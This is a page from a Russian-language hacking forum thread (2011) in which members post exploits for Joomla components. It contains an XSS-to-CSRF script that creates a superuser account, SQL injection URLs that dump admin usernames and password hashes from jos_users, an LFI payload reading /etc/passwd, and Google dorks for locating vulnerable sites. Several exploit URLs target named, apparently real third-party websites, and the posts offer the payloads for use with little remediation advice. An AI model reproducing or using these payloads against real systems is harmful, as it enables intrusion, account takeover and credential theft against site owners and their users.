HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #211  
Старый 12.07.2011, 11:07
абвгдешка
Guest
Сообщений: n/a
Провел на форуме:
9121

Репутация: 1
По умолчанию

Joomla 1.6.3 CSRF Exploit

Код:
Code:
This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability ( http://seclists.org/fulldisclosure/2011/Jun/519 ) to execute a CSRF vulnerability to create a superuser account.

/*
joom163.js
Joomla 1.6.3 XSS -> CSRF Exploit
Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
Coded By: Connection
 
Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>">
 
*/
document.writeln('');
 
function read()
{
var name="Test";
var username="haxx";
var password="test123";
var email="fake _at_ gmail.com";
 
document.getElementById("iframe").contentDocument.forms[0].jform_name.value = name;
document.getElementById("iframe").contentDocument.forms[0].jform_username.value = username;
document.getElementById("iframe").contentDocument.forms[0].jform_password.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_password2.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_email.value = email;
document.getElementById("iframe").contentDocument.forms[0].getElementById("1group_8").checked=true;
document.getElementById("iframe").contentDocument.getElementsByTagName("a")[11].onclick();
}
 
Ответить с цитированием

  #212  
Старый 18.07.2011, 16:35
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Joomla com_yvhotels SQL-inj Vuln

# Exploit Title: Joomla com_yvhotels SQL-inj Vuln

# Date: 18.07.2011

# Author: z0mbyak

# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html

# Version: 1.1.1

# Category: [remote, webapps.]

# Google dork: inurl:"index.php?option=com_yvhotels"

# Tested in: web

Code:

Цитата:
Сообщение от None  
function show_info( $task ) {
$id = mosGetParam($_REQUEST, 'id');
switch($task) {
case 'desc':
show_hotel_desc( $id );
break;
case 'facils':
show_hotel_facils( $id );
break;
case 'rooms':
show_hotel_rooms( $id );
break;
case 'address':
show_hotel_address( $id );
break;
}
}
function show_hotel_desc( $id ) {
global $database;
$database->setQuery( "SELECT * FROM #__yvhotels WHERE id=$id");
$rows = $database->loadObjectList();
if ($database->getErrorNum()) {
echo $database->stderr();
return false;
}
$row = $rows[0];
HTML_yvhotels_front::show_hotel_desc( $row );
}
SQL-Inj Vulnerability:

exploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11 ,12,database(),version(),15,16,17,18,19,20,21--

VulnSite:

http://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=d esc&id=null+union+all+select+1,2,3,4,user%28%29,6, 7,8,9,10,11,12,database%28%29,version%28%29,15,16, 17,18,19,20,21--

Специально для forum.antichat.ru и rdot.org/forum/

z0mbyak.
 
Ответить с цитированием

  #213  
Старый 22.07.2011, 12:33
абвгдешка
Guest
Сообщений: n/a
Провел на форуме:
9121

Репутация: 1
По умолчанию

Joomla Component mod_spo SQL Injection Vulnerability

# Exploit Title: Simple Page Option LFI

# Google Dork: inurl:mod_spo

# Date: 15/07/2011

# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca

# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip

# Version: 1.5.x

# Tested on: Backtrack and Windows 7

Simple Page Option – LFI

Vulnerable-Code:

$s_lang

=& JRequest::getVar('spo_site_lang');

(file_exists(dirname(__FILE__).DS.'languages'.DS.$ s_lang.'.php'))

? include(dirname(__FILE__).DS.'languages'.DS.$s_lan g.'.php')

: include(dirname(__FILE__).DS.'languages'.DS.'engli sh.php');

Vulnerable-Var:

spo_site_lang=

Expl0iting:

http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst

/* */

&spo_f_email[0]=sample@email.tst

/* */

&spo_message=20&spo_msg_ftr=This%20contact%20messa ge%20was%20generated%20using[/CODE]

%20Simple%20Page%20Options%20Module%20from%20SITEU RL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&sp o_url2se

Reparing?:

Just Filter with str_replace(); or htaccess protection to the vulnerable file.

gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.
 
Ответить с цитированием

  #214  
Старый 27.07.2011, 00:27
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Joomla com_hitexam SQL-Inj

Что?? Моя любимая тема на второй позиции??? Не порядок)

Дата: 26,07,2011 16:00

Продукт: Joomla component com_hitexam, скачать _http://www.jomexperts.com/download/doc_details/5-hitexam.html?tmpl=component

Уязвимость: SQL-Inj

Автор: z0mbyak

Тип: удалённая

Опасность: 7 (так как это не прямая заливка и возможность закрыться сторонними фильтрами, например sweb)

Описание: Уязвимость существует из-за недостаточной фильтрации входящих данных:

PHP код:

function getLevels($id){

$db = $this->getDBO();

$sql = "select l.level,l.description,l.id as l_id,s.name,s.id from #__exam_levels as l, #__exam_ques_bank as q,#__exam_subjects as s where q.lvl_id=l.id and s.id=q.sub_id and q.published=1 and q.sub_id=$id";

$db->setQuery($sql);

$results = $db->loadObjectList();

return $results;

}

Эксплоит:

_http://www.e-v-r.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger

_http://www.mira15.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger

dork: inurl:"index.php?option=com_hitexam"

Для устранения уязвимости, нужно просто должным образом фильтровать входящие данные)

P.S. Извини Dark, не удержался, я вообще щедрый)))
 
Ответить с цитированием

  #215  
Старый 01.08.2011, 10:37
абвгдешка
Guest
Сообщений: n/a
Провел на форуме:
9121

Репутация: 1
По умолчанию

Joomla Component (com_obSuggest) Local File Inclusion Vulnerability


[CODE]
Code:
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | '
 
Ответить с цитированием

  #216  
Старый 02.08.2011, 12:30
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Joomla com_adagency SQl-Inj

#Продукт: com_adagency

#Тип уязвимости: SQL-Inj

#Автор: z0mbyak

Exploit: /index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version()--

PoC:

http://www.charliesheens-korner.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--




http://joomla15.ijoomlademo.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=0&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--


Специально для forum.antichat.ru и rdot.org/forum/
 
Ответить с цитированием

  #217  
Старый 02.08.2011, 12:53
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Joomla com_ag_vodmatvil SQl-Inj

#Продукт: com_ag_vodmatvil

#Тип: SQL-Inj

#Автор: z0mbyak

#exploit: /index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat(username,0x3a,passwo rd,0x3a,usertype),3+from+jos_users--&Itemid=20

PoC:

http://tube.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20

http://vod.solo.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20

P.S. Вот, блин, мне делать нефиг)

Специально для forum.antichat.ru и rdot.org/forum/
 
Ответить с цитированием

  #218  
Старый 04.08.2011, 09:11
абвгдешка
Guest
Сообщений: n/a
Провел на форуме:
9121

Репутация: 1
По умолчанию

Joomla Component (com_jdirectory) SQL Injection Vulnerability

Код:
Code:
=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >     >  |_(   )  ||  |   /_____/ |  / /_/ |
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/ 
            Exploit-ID is the Exploit Information Disclosure
  
Web             : exploit-id.com   
e-mail          : root[at]exploit-id[dot]com            
  
                     #########################################           
               I'm Caddy-Dz, member of Exploit-Id              
             #########################################           
======================================================================
  
####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####
  
  [*] ExpLo!T :
  
http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
  
http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here
  
  
####
 
[+] Peace From Algeria
  
####
 
=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
  RmZ ...others                                                                              |
============================================================================================ |
 
Ответить с цитированием

  #219  
Старый 10.08.2011, 08:45
абвгдешка
Guest
Сообщений: n/a
Провел на форуме:
9121

Репутация: 1
По умолчанию

[B][COLOR="DarkGreen"][SIZE="2"]TNR Enhanced Joomla Search
 
Ответить с цитированием

  #220  
Старый 11.08.2011, 17:05
Unknown
Guest
Сообщений: n/a
Провел на форуме:
4100

Репутация: 74
По умолчанию

Joomla Fastball component[SQL Injection]

Dork : inurl:"option=com_fastball"

About 1,370,000 results



exploit:


Код:
Code:
http://j15/index.php?option=com_fastball&league=123+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9,10,11+from+jos_users--
Веселитесь...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ